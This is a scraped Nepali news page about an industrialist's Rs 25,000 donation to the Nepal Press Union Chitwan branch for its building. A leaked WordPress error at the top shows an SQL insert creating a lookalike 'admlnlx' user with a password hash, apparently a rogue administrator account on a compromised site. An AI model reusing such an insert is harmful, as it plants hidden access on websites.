WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLFl31u66szWYYF46D61sYB0ChGKGo0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 19:09:23', '', 'admlnlx', 'admlnlx')
चितवन, पुस १०–
चितवन उद्योग संघका प्रथम उपाध्यक्ष तथा नेपाली काँग्रेसका नेता त्रिलोचन कँडेलले नेपाल प्रेस युनियन चितवन शाखालाई आर्थिक सहयोग गर्नुभएको छ ।
आज एक कार्यक्रमकाबीच शहरी विकास मन्त्री अर्जुन नरसिंह केसी मार्फत उद्योगी व्यवसायी कँडेलले २५ हजार रुपैयाँको चेक हस्तान्तरण गर्नुभयो । मन्त्री केसीले सो चेक युनियनका अध्यक्ष नारायणप्रसाद अधिकारीलाई प्रदान गर्नुभएको थियो । युनियनको भवन निर्माणार्थ सो रकम सहयोग गरिएको कँडेलले बताउनुभयो ।
युयिनको भवन गत वर्षको पुष १० गते आजकै दिन शिलन्यास गरिएको थियोे । हाल सो भवन निर्माण सम्पन्न हुने क्रममा रहेको छ ।